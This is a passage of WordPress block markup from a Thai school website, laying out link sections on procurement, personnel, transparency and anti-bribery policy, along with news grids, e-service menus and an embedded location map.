{\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=828\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1010\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-1 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:loginout /--></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container 